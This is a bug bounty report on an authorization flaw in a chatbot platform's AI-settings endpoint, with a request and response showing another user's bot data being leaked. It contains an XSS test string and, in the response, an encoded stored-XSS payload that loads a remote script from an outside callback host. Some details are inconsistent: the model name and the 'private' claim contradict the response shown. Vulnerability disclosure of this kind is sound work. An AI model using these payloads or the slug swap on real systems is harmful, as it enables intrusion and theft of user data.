Bug Bounty Report: Unauthorized Access to Private Chatbot Data (PII Leak) on Sensay Studio
"
"><img src=x onerror=prompt("XSS")>
📌 Affected Domain:
📋 Summary:
An attacker can access and leak private chatbot data of other users on https://studio.sensay.io by sending a crafted POST request to the endpoint:
POST /support-mail-reply/ai-settings
By simply changing the slug (chatbot name) in the request body, an unauthorized user can retrieve private details of any other chatbot, even if it's not owned by them. This includes sensitive metadata such as owner_user.id, owner_user.organization_uuid, chatbot descriptions, avatar URLs, and usage settings.
🔥 Severity: Critical
This is a high-impact, low-complexity issue:
No authentication or authorization checks are enforced on the POST /[slug]/ai-settings endpoint.
Anyone can extract private chatbot configurations.
Leaks identifiable owner data: user_id, organization_uuid, profile_image, internal bot configuration.
🧪 Steps to Reproduce:
Create your own chatbot (e.g., my-mail-reply) at:
Intercept a request in Burp Suite or any proxy tool during AI Settings access:
POST /support-mail-reply/ai-settings
In the POST request body, change:
["my-mail-reply"]
to any other known slug, like:
["support-mail-reply"]
Send the request and observe the 200 OK response with unauthorized access to private chatbot data.
📥 Request Sample:
POST /support-mail-reply/ai-settings HTTP/2
Host: studio.sensay.io
Content-Type: text/plain;charset=UTF-8
...
Body: ["my-mail-reply"]
Change ["my-mail-reply"] to:
["support-mail-reply"]
📤 Response Sample (Redacted for Privacy):
0:{"a":"$@1","f":"","b":"kErOwdq0nNScm0gWuA9ck"}
1:["success",{"created_at":"2025-09-12T09:39:12.765267+00:00","name":"support mail reply","elevenlabsId":null,"system_message":"\"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL21laHJhYjM1MDAiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>","introduction":"How can I help you?<h1>heelo</h1>","suggested_questions":[],"metadata":null,"updated_at":"2025-09-12T09:48:54.001231+00:00","introduction_audio_id":null,"model":"gemini-2.5-pro","whitelisted_emails":[],"uuid":"fe2659cd-8a15-4784-9e79-12d5bc9f195e","private":false,"training_type":"brand","tools":[],"profile_image":"https://xotqxvmmnunwfsaemqfy.supabase.co/storage/v1/object/public/persona_images/fe2659cd-8a15-4784-9e79-12d5bc9f195e/profile-2025-09-12T09:39:12.804Z.png","owner_uuid":"05632fa4-e2b8-4d18-ac6f-be2273622bbe","hg_custom_avatar_id":null,"el_custom_voice_id":null,"voice_manager":"none","gender":null,"short_description":"I'm an AI agent of support mail reply","searchable":true,"tags":[],"slug":"support-mail-reply","guardrails":"ai_model,no_code_writing","temperature":0.1,"moderation":true,"hallucination_check":true,"company":null,"job_title":null,"purpose":"Purpose: support mail reply. Purpose: Sales. Help your customers find the right products, faster.","website":null,"voice_preview_text":"Hi, I'm your Sensay replica! How can I assist you today?","is_every_conversation_accessible_by_support":false,"max_tokens":128,"owner_user":{"id":"05632fa4-e2b8-4d18-ac6f-be2273622bbe","organization_uuid":"a266dd3b-a474-4cde-9dbd-c0a956dbd23c"}}]
🔍 Impact:
Exposure of PII: user ID, organization UUID, profile image.
Leaks internal AI assistant configurations, including:
Model type (gpt-4o)
Training type
Moderation settings
Temperature
Tags, Guardrails
May allow for reconnaissance attacks, impersonation, or social engineering.
🔒 Recommended Fix:
Enforce authorization checks on POST /[slug]/ai-settings to ensure only chatbot owners or authorized users can access bot settings.
Sanitize and validate the slug parameter against the current user's permissions.
Consider logging and rate-limiting access to this endpoint.
💬 Optional Improvements:
Introduce strict role-based access control (RBAC) for all dynamic routes like /:slug/ai-settings.
Hide or obfuscate internal UUIDs from client responses unless absolutely necessary.
Implement audit logging to track unusual access patterns to bot settings.
📎 Metadata:
Endpoint: POST /[slug]/ai-settings
Vulnerable Slug Example: support-mail-reply
Discovered On: 2025-09-12
Tested Via: Burp Suite / Browser Dev Tools